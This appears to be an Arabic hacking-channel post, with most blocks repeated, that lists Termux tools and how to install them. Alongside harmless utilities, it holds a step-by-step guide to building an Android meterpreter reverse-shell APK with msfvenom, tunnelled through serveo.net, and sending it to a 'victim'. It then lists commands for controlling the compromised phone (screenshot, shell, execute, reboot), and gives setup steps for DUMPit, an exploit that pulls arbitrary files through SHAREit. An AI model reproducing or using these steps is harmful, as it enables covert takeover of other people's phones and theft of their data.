1- اداة thematermux
و ظيفتها عمل ثيم ل termux و تصميم و غيرة
git clone https://github.com/kangris-sket/thematermux
cd thematermux
chmod +x changethema.sh
./changethema.sh
done!
#CS
و ظيفتها عمل ثيم ل termux و تصميم و غيرة
git clone https://github.com/kangris-sket/thematermux
cd thematermux
chmod +x changethema.sh
./changethema.sh
done!
#CS
GitHub
GitHub - kangris-sket/thematermux: Change Thema Termux
Change Thema Termux. Contribute to kangris-sket/thematermux development by creating an account on GitHub.
2- اداة Crips
[✓] git clone https://github.com/Manisso/Crips.git
[✓] cd Crips && python Crips.py
[◉] 0 : INSTALL & UPDATE
[◉] -> 0
[✓] press 0
[✓] Congratulation Crips is Installed !
مميزاتها
Whois lookup
Traceroute
DNS Lookup
Reverse DNS Lookup
GeoIP Lookup
Port Scan
Reverse IP Lookup
INSTALL & UPDATE
Exit
#CS
[✓] git clone https://github.com/Manisso/Crips.git
[✓] cd Crips && python Crips.py
[◉] 0 : INSTALL & UPDATE
[◉] -> 0
[✓] press 0
[✓] Congratulation Crips is Installed !
مميزاتها
Whois lookup
Traceroute
DNS Lookup
Reverse DNS Lookup
GeoIP Lookup
Port Scan
Reverse IP Lookup
INSTALL & UPDATE
Exit
#CS
GitHub
GitHub - Manisso/Crips: IP Tools To quickly get information about IP Address's, Web Pages and DNS records.
IP Tools To quickly get information about IP Address's, Web Pages and DNS records. - Manisso/Crips
4- اداة Xoxo
و ظيفتها تعديل فديو و عرض و تحميل و تسجيل بث و هيك شغلات
git clone -b master https://github.com/kangris-sket/xoxodroid
cd Xoxo
chmod 755 *.sh
./bin/linux_android.sh
./install_android.sh
./xoxodroid.sh
#CS
و ظيفتها تعديل فديو و عرض و تحميل و تسجيل بث و هيك شغلات
git clone -b master https://github.com/kangris-sket/xoxodroid
cd Xoxo
chmod 755 *.sh
./bin/linux_android.sh
./install_android.sh
./xoxodroid.sh
#CS
GitHub
kangris-sket/xoxodroid
xoxo in termux android | beta tested. Contribute to kangris-sket/xoxodroid development by creating an account on GitHub.
5- اداة
AndroBugs Framework
هو نظام لتحليل الثغرات الأمنية في Android يساعد المطورين أو المتسللين على إيجاد ثغرات أمنية محتملة في تطبيقات Android. لا واجهة واجهة المستخدم الرسومية الرائعة ، ولكن الأكثر كفاءة (أقل من دقيقتين لكل مسح في المتوسط) وأكثر دقة.
طريقه تبيتها
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/AndroBugs/AndroBugs_Framework
$ python androbugs.py -f [APK file]
معرفه طريقه عملهاا
python androbugs.py -h
#CS
AndroBugs Framework
هو نظام لتحليل الثغرات الأمنية في Android يساعد المطورين أو المتسللين على إيجاد ثغرات أمنية محتملة في تطبيقات Android. لا واجهة واجهة المستخدم الرسومية الرائعة ، ولكن الأكثر كفاءة (أقل من دقيقتين لكل مسح في المتوسط) وأكثر دقة.
طريقه تبيتها
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/AndroBugs/AndroBugs_Framework
$ python androbugs.py -f [APK file]
معرفه طريقه عملهاا
python androbugs.py -h
#CS
GitHub
GitHub - AndroBugs/AndroBugs_Framework: AndroBugs Framework is an efficient Android vulnerability scanner that helps developers…
AndroBugs Framework is an efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications. No need to install on Windows. - ...
السلام عليكم ورحمة الله وبركاته
1- pkg install openssh
2 - ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
صفحه جديدة تكتب أوامر الميتا
و نكتب اوامر عمل البايلود
اولا :
cd metasploit-framework
(ملحوظه :: هذي إذا كانت الملف تبع الميتا مظهر تكتب الأمر السابق )
و بعدها
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/CS.apk
ثانيا نفتح اداة الميتاسبلويت بالامر
./msfconsole
ثالثا بعد الدخول علي الميتاسبلويت نكتب الاوامر
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
exploit
قم بإرسال ارساله للضحية
و بعدها يصلك تبليغ وتفتح الجلسه عندك
أوامر التحكم تكتب help أو ?
#CS
1- pkg install openssh
2 - ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
صفحه جديدة تكتب أوامر الميتا
و نكتب اوامر عمل البايلود
اولا :
cd metasploit-framework
(ملحوظه :: هذي إذا كانت الملف تبع الميتا مظهر تكتب الأمر السابق )
و بعدها
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/CS.apk
ثانيا نفتح اداة الميتاسبلويت بالامر
./msfconsole
ثالثا بعد الدخول علي الميتاسبلويت نكتب الاوامر
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
exploit
قم بإرسال ارساله للضحية
و بعدها يصلك تبليغ وتفتح الجلسه عندك
أوامر التحكم تكتب help أو ?
#CS
بعض اوامر التحكم في جهاز الضحيه
لأعادة تشغيل جهاز الضحية : reboot
لاطفاء جهاز الضحية : shutdown
لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo
لألتقاط صورة من شاشة الضحية : screenshot
لاضهار اتصلات الشبكة وجميع البرامج و الملفات المتصلة بالانترنت و مستهلكة للانترنت : netstat
للدخول الي الملفات الداخليه و كتابة الاوامر كأنك في جهاز الضحية : shell
لاقلاع اي برنامج علي جهاز الضحية بامر واحد منك : execute -f mc.apk
طبعا غير mc الي اسم البرنامج الذي تريده ان يشتغل معك
#Database✔✔
#CS💙
لأعادة تشغيل جهاز الضحية : reboot
لاطفاء جهاز الضحية : shutdown
لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo
لألتقاط صورة من شاشة الضحية : screenshot
لاضهار اتصلات الشبكة وجميع البرامج و الملفات المتصلة بالانترنت و مستهلكة للانترنت : netstat
للدخول الي الملفات الداخليه و كتابة الاوامر كأنك في جهاز الضحية : shell
لاقلاع اي برنامج علي جهاز الضحية بامر واحد منك : execute -f mc.apk
طبعا غير mc الي اسم البرنامج الذي تريده ان يشتغل معك
#Database✔✔
#CS💙
اداة DUMPit
هو استغلال لتطبيق SHAREit للجوال حيث يسيء استخدام ثغرتين تم اكتشافهما مؤخرًا وتؤثر على تطبيق SHAREit Android <= v 4.0.38. الأول يسمح للمهاجم بتجاوز آلية مصادقة جهاز SHAREit ، والآخر يمكّن المهاجم المصادق من تنزيل الملفات التعسفية من جهاز المستخدم. تم الإبلاغ عن كلا الثغرات الأمنية للبائع وتم إصدار تصحيحات.
اول شي قم بالدخول ع termux و بعدها
اكتب الاوامر التاليه بالترتيب
pkg install git python2
git clone https://github.com/redforcesec/Dumpit.git
cd Dumpit
python2 server.py
#CS
هو استغلال لتطبيق SHAREit للجوال حيث يسيء استخدام ثغرتين تم اكتشافهما مؤخرًا وتؤثر على تطبيق SHAREit Android <= v 4.0.38. الأول يسمح للمهاجم بتجاوز آلية مصادقة جهاز SHAREit ، والآخر يمكّن المهاجم المصادق من تنزيل الملفات التعسفية من جهاز المستخدم. تم الإبلاغ عن كلا الثغرات الأمنية للبائع وتم إصدار تصحيحات.
اول شي قم بالدخول ع termux و بعدها
اكتب الاوامر التاليه بالترتيب
pkg install git python2
git clone https://github.com/redforcesec/Dumpit.git
cd Dumpit
python2 server.py
#CS
GitHub
GitHub - redforcesec/Dumpit: An exploit for SHAREit <= v 4.0.38
An exploit for SHAREit <= v 4.0.38. Contribute to redforcesec/Dumpit development by creating an account on GitHub.
كيفية إزالة فيروس الاختصار بشكل دائم من أجهزة الكمبيوتر الشخصية ، Pendrive والكمبيوتر المحمول Laptopopen CMD. فقط اكتب cmd في تشغيل أو ابحث عن موجه الأوامر في قائمة البداية. أدخل الآن اسم محرك الأقراص الذي يوجد به الفيروس. : مثل "f: ،" إذا كان F هو اسم محرك الأقراص أو أي محرك أقراص آخر وفقًا لمحرك الأقراص الذي تريد إزالة الاختصار منه. الآن اكتب "attrib f: *. * / d / s -h -r -s" attrib-hrs / s / df: *. * -h: لإخفاء كافة الملفات الموجودة على محرك الأقراص W -r: إنشاء الملفات في محرك الأقراص W خالية من السمة للقراءة فقط. -s: جعل جميع الملفات الموجودة على محرك الأقراص W ليست جزءًا من النظام مرة أخرى ، بحيث تكون مريحة في محرك الأقراص f: w مشرق *. *: جميع الملفات التي تنتهي بـ Now هذا الأمر سوف يزيل جميع الاختصارات من محرك الأقراص. من السهل إزالة جميع فيروسات الاختصارات من جهاز الكمبيوتر أو محرك أقراص فلاش USB باستخدام CMD.
#CS
#CS